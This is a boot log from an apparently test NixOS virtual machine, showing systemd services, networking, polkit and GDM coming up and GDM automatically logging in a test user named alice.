machine # ░░
machine # ░░ A start job for unit network-addresses-eth1.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 86.
machine # Aug 02 11:49:34 machine systemd[1]: Started D-Bus System Message Bus.
machine # ░░ Subject: A start job for unit dbus.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit dbus.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 82.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: No service file found in /etc/avahi/services.
machine # Aug 02 11:49:34 machine nsncd[818]: Aug 02 11:49:34.338 INFO started, config: Config { ignored_request_types: {}, worker_count: 8, handoff_timeout: 3s }, path: "/var/run/nscd/socket"
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Joining mDNS multicast group on interface lo.IPv4 with address 127.0.0.1.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: New relevant interface lo.IPv4 for mDNS.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Network interface enumeration completed.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Server startup complete. Host name is machine.local. Local service cookie is 1540830512.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Got SIGHUP, reloading.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: No service file found in /etc/avahi/services.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Network Manager...
machine # ░░ Subject: A start job for unit NetworkManager.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit NetworkManager.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 80.
machine # Aug 02 11:49:34 machine systemd[1]: Started Name Service Cache Daemon (nsncd).
machine # ░░ Subject: A start job for unit nscd.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nscd.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 142.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target Host and Network Name Lookups.
machine # ░░ Subject: A start job for unit nss-lookup.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nss-lookup.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 222.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target User and Group Name Lookups.
machine # ░░ Subject: A start job for unit nss-user-lookup.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit nss-user-lookup.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 221.
machine # Aug 02 11:49:34 machine systemd[1]: Started Avahi mDNS/DNS-SD Stack.
machine # ░░ Subject: A start job for unit avahi-daemon.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit avahi-daemon.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 102.
machine # Aug 02 11:49:34 machine dbus-daemon[747]: [system] Successfully activated service 'org.freedesktop.systemd1'
machine # Aug 02 11:49:34 machine systemd[1]: Started Virtual Machine and Container Registration Service.
machine # ░░ Subject: A start job for unit systemd-machined.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-machined.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 114.
machine # Aug 02 11:49:34 machine systemd[1]: Started Network Manager Script Dispatcher Service.
machine # ░░ Subject: A start job for unit NetworkManager-dispatcher.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit NetworkManager-dispatcher.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 88.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: Joining mDNS multicast group on interface eth1.IPv4 with address 192.168.1.1.
machine # Aug 02 11:49:34 machine avahi-daemon[745]: New relevant interface eth1.IPv4 for mDNS.
machine # Aug 02 11:49:34 machine network-addresses-eth1-start[829]: adding address 192.168.1.1/24... done
machine # Aug 02 11:49:34 machine dbus-daemon[747]: [system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkit.service' requested by ':1.5' (uid=0 pid=770 comm="/nix/store/xnr1dif077xncnxim4np3v0p5hh7w1yg-accoun" label="kernel")
machine # Aug 02 11:49:34 machine network-addresses-eth1-start[829]: adding address 2001:db8:1::1/64... done
machine # Aug 02 11:49:34 machine systemd[1]: Starting Authorization Manager...
machine # ░░ Subject: A start job for unit polkit.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit polkit.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 223.
machine # Aug 02 11:49:34 machine systemd[1]: Finished Address configuration of eth1.
machine # ░░ Subject: A start job for unit network-addresses-eth1.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit network-addresses-eth1.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 86.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Networking Setup...
machine # ░░ Subject: A start job for unit network-setup.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit network-setup.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 85.
machine # Aug 02 11:49:34 machine dbus-daemon[747]: [system] Activating via systemd: service name='org.freedesktop.hostname1' unit='dbus-org.freedesktop.hostname1.service' requested by ':1.7' (uid=0 pid=837 comm="/nix/store/vswdvvpbcav6rfzmaxg1f299ark1pp6y-networ" label="kernel")
machine # Aug 02 11:49:34 machine systemd[1]: Starting Hostname Service...
machine # ░░ Subject: A start job for unit systemd-hostnamed.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-hostnamed.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 300.
machine # Aug 02 11:49:34 machine polkitd[850]: Started polkitd version 124
machine # Aug 02 11:49:34 machine polkitd[850]: Loading rules from directory /etc/polkit-1/rules.d
machine # Aug 02 11:49:34 machine polkitd[850]: Loading rules from directory /run/current-system/sw/share/polkit-1/rules.d
machine # Aug 02 11:49:34 machine polkitd[850]: Finished loading, compiling and executing 6 rules
machine # Aug 02 11:49:34 machine dbus-daemon[747]: [system] Successfully activated service 'org.freedesktop.PolicyKit1'
machine # Aug 02 11:49:34 machine systemd[1]: Started Authorization Manager.
machine # ░░ Subject: A start job for unit polkit.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit polkit.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 223.
machine # Aug 02 11:49:34 machine polkitd[850]: Acquired the name org.freedesktop.PolicyKit1 on the system bus
machine # Aug 02 11:49:34 machine accounts-daemon[770]: started daemon version 23.13.9
machine # Aug 02 11:49:34 machine systemd[1]: Started Accounts Service.
machine # ░░ Subject: A start job for unit accounts-daemon.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit accounts-daemon.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 112.
machine # Aug 02 11:49:34 machine systemd[1]: Finished Networking Setup.
machine # ░░ Subject: A start job for unit network-setup.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit network-setup.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 85.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Extra networking commands....
machine # ░░ Subject: A start job for unit network-local-commands.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit network-local-commands.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 84.
machine # Aug 02 11:49:34 machine systemd[1]: Started Hostname Service.
machine # ░░ Subject: A start job for unit systemd-hostnamed.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-hostnamed.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 300.
machine # Aug 02 11:49:34 machine dbus-daemon[747]: [system] Successfully activated service 'org.freedesktop.hostname1'
machine # Aug 02 11:49:34 machine systemd[1]: Finished Extra networking commands..
machine # ░░ Subject: A start job for unit network-local-commands.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit network-local-commands.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 84.
machine # Aug 02 11:49:34 machine systemd[1]: Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch.
machine # ░░ Subject: A start job for unit systemd-rfkill.socket has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-rfkill.socket has finished successfully.
machine # ░░
machine # ░░ The job identifier is 376.
machine # Aug 02 11:49:34 machine systemd[1]: Started Network Manager.
machine # ░░ Subject: A start job for unit NetworkManager.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit NetworkManager.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 80.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target Network.
machine # ░░ Subject: A start job for unit network.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit network.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 83.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Network Manager Wait Online...
machine # ░░ Subject: A start job for unit NetworkManager-wait-online.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit NetworkManager-wait-online.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 79.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Permit User Sessions...
machine # ░░ Subject: A start job for unit systemd-user-sessions.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-user-sessions.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 98.
machine # Aug 02 11:49:34 machine kernel: NET: Registered PF_PACKET protocol family
machine # Aug 02 11:49:34 machine systemd[1]: Finished Permit User Sessions.
machine # ░░ Subject: A start job for unit systemd-user-sessions.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit systemd-user-sessions.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 98.
machine # Aug 02 11:49:34 machine systemd[1]: Starting Display Manager...
machine # ░░ Subject: A start job for unit display-manager.service has begun execution
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit display-manager.service has begun execution.
machine # ░░
machine # ░░ The job identifier is 113.
machine # Aug 02 11:49:34 machine systemd[1]: Started Getty on tty1.
machine # ░░ Subject: A start job for unit getty@tty1.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit getty@tty1.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 104.
machine # Aug 02 11:49:34 machine systemd[1]: Reached target Login Prompts.
machine # ░░ Subject: A start job for unit getty.target has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit getty.target has finished successfully.
machine # ░░
machine # ░░ The job identifier is 103.
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: Enabling debugging
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: Changing user:group to gdm:gdm
machine # Aug 02 11:49:34 machine gdm[929]: GLib-GIO: Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:34 machine systemd[1]: Started Display Manager.
machine # ░░ Subject: A start job for unit display-manager.service has finished successfully
machine # ░░ Defined-By: systemd
machine # ░░ Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
machine # ░░
machine # ░░ A start job for unit display-manager.service has finished successfully.
machine # ░░
machine # ░░ The job identifier is 113.
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: Successfully connected to D-Bus
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmManager: GDM starting to manage displays
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: enumerating seats from logind
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: display for seat seat0 requested
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: Checking if udev has settled enough to support graphics.
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: Found primary PCI graphics adapter, proceeding.
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: udev has settled enough for graphics.
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: System supports graphics
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: Getting session type (prefers wayland, falling back: no)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: New displays on seat0 will use wayland
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: wayland login display for seat seat0 requested
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: Adding display on seat seat0
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: id: (null)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: seat id: (null)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: session class: greeter
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: initial: no
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: allow timed login: yes
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: local: yes
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: supported session types: (null)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: session type: wayland
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: supported session types: wayland:x11
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: seat id: seat0
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: initial: yes
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplayStore: Adding display /org/gnome/DisplayManager/Displays/21713776 to store
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: Managing display: /org/gnome/DisplayManager/Displays/21713776
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: Preparing display: /org/gnome/DisplayManager/Displays/21713776
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: Checking kernel command buffer initrd=\EFI\nixos\71fy5sjiw960h9lsr2468i51whk6kzm0-initrd-linux-6.6.43-initrd.efi init=/nix/store/iwhmxln8mmfmjq5cirkqhf7c3awql97d-nixos-system-machine-test/init console=tty1
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: Failed to read kernel commandline: Could not match gnome.initial-setup= in kernel cmdline
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: doing initial setup? no
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: prepare display
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: Got automatic login details for display: 1 alice
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: trying to track new user with username alice
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: finding user 'alice' state 1
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: waiting for user manager to load before finding user 'alice'
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: display status changed: 1
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: received VT change event
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmLocalDisplayFactory: VT is 1 at startup
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: Finding a graphical session for user 0
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: Failed to identify the current session
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: seat unloaded, so trying to set loaded property
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: Seat wouldn't load, so giving up on it and setting loaded property
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: user manager now loaded, proceeding with fetch user request for user 'alice'
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: finding user 'alice' state 2
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: Looking for user 'alice' in accounts service
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: already loaded, so not setting loaded property
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: Found object path of user 'alice': /org/freedesktop/Accounts/User1000
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: finding user 'alice' state 3
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: user 'alice' fetched
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: user alice is now loaded
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: user alice was not yet known, adding it
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: tracking user 'alice'
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: not yet loaded, so not emitting user-added signal
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: no pending users, trying to set loaded property
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: already loaded, so not setting loaded property
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDBusUtils: Registered DBus error domain 'gdm-session-worker-error-quark'
machine # Aug 02 11:49:34 machine gdm[929]: GLib: setenv()/putenv() are not thread-safe and should not be used after threads are created
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Creating D-Bus server for worker for session
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: D-Bus server for workers listening on unix:path=/var/run/gdm/dbus/dbus-htCejKOS
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Creating D-Bus server for greeters and such for session (null) (0x14f79f0)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: D-Bus server for greeters listening on unix:path=/var/run/gdm/dbus/dbus-mYkP3ovG
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Setting display device: (null)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Created user session for user 0 on display /org/gnome/DisplayManager/Displays/21713776 (seat seat0)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmManager: Starting automatic login conversation
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: starting conversation gdm-autologin for session (0x14f79f0)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSessionWorkerJob: Starting worker...
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSessionWorkerJob: Running session_worker_job process: gdm-session-worker [pam/gdm-autologin] /nix/store/d92pp3wnwfh3giwcjrbzlybzpd7v1yxn-gdm-46.2/libexec/gdm-session-worker
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSessionWorkerJob: : SessionWorkerJob on pid 937
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: finished handling request for user 'alice'
machine # Aug 02 11:49:34 machine gdm[929]: accountsservice: ActUserManager: unrefing manager owned by fetch user request
machine # Aug 02 11:49:34 machine dbus-daemon[747]: [system] Activating via systemd: service name='org.freedesktop.resolve1' unit='dbus-org.freedesktop.resolve1.service' requested by ':1.7' (uid=0 pid=837 comm="/nix/store/vswdvvpbcav6rfzmaxg1f299ark1pp6y-networ" label="kernel")
machine # Aug 02 11:49:34 machine dbus-daemon[747]: [system] Activation via systemd failed for unit 'dbus-org.freedesktop.resolve1.service': Unit dbus-org.freedesktop.resolve1.service not found.
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: Enabling debugging
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: connecting to address: unix:path=/var/run/gdm/dbus/dbus-htCejKOS
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDBusServer: new connection 0x7f0a0c000b70
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Handling new connection from worker
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Authenticating new connection
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: worker connection is 0x7f0a0c000b70
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Emitting conversation-started signal
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmManager: session conversation started for service gdm-autologin on session
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmDisplay: Got automatic login details for display: 1 alice
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmManager: begin auto login for user 'alice'
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: checking if file 'gnome.desktop' is wayland session: yes
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: setting session to type 'wayland'
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Set up service gdm-autologin for username alice on session (0x14f79f0)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: selecting user 'alice' for session '(null)' (0x14f79f0)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Beginning initialization
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: getting session command for file 'gnome.desktop'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: GLib-GIO: Using cross-namespace EXTERNAL authentication (this will deadlock if server is GDBus < 2.73.3)
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: checking if file 'gnome.desktop' is wayland session: yes
machine # Aug 02 11:49:34 machine gdm[929]: Gdm: GdmSession: Conversation started
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: trying to track new user with username alice
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: finding user 'alice' state 1
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: waiting for user manager to load before finding user 'alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: Finding a graphical session for user 0
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: Failed to identify the current session
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: seat unloaded, so trying to set loaded property
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: Seat wouldn't load, so giving up on it and setting loaded property
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: user manager now loaded, proceeding with fetch user request for user 'alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: finding user 'alice' state 2
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: Looking for user 'alice' in accounts service
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: already loaded, so not setting loaded property
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: Found object path of user 'alice': /org/freedesktop/Accounts/User1000
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: finding user 'alice' state 3
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: user 'alice' fetched
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: user alice is now loaded
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: user alice was not yet known, adding it
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: tracking user 'alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: not yet loaded, so not emitting user-added signal
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: no pending users, trying to set loaded property
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: already loaded, so not setting loaded property
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionSettings: saved session is (type )
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionSettings: saved language is
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: queuing setup for user: alice (null)
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: finished handling request for user 'alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: accountsservice: ActUserManager: unrefing manager owned by fetch user request
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: attempting to change state to SETUP_COMPLETE
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: initializing PAM; service=gdm-autologin username=alice seat=seat0
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'XDG_SEAT=seat0'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: state SETUP_COMPLETE
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: attempting to change state to AUTHENTICATED
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: authenticating user alice
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: state AUTHENTICATED
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: trying to get updated username
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: username is 'alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: old-username='alice' new-username='alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: attempting to change state to AUTHORIZED
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: determining if authenticated user (password required:0) is authorized to session
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: state AUTHORIZED
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: attempting to change state to ACCREDITED
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: forwarding GDM_X_SERVER_EXTRA_ARGS= -config /nix/store/79ni67pdcrik4g0zhzw03kf6cqmwsdnw-xserver.conf -xkbdir /nix/store/yg835k9fgblqmhx7zg42c1bqxmrkrb4v-xkeyboard-config-2.42/etc/X11/xkb -logfile /dev/null -nolisten tcp
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'GDM_X_SERVER_EXTRA_ARGS=-config /nix/store/79ni67pdcrik4g0zhzw03kf6cqmwsdnw-xserver.conf -xkbdir /nix/store/yg835k9fgblqmhx7zg42c1bqxmrkrb4v-xkeyboard-config-2.42/etc/X11/xkb -logfile /dev/null -nolisten tcp'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'LOGNAME=alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'USER=alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'USERNAME=alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'HOME=/home/alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'PWD=/home/alice'
machine # Aug 02 11:49:34 machine gdm-autologin][937]: Gdm: GdmSessionWorker: Set PAM environment variable: 'SHELL=/run/current-system/sw/bin/bash'
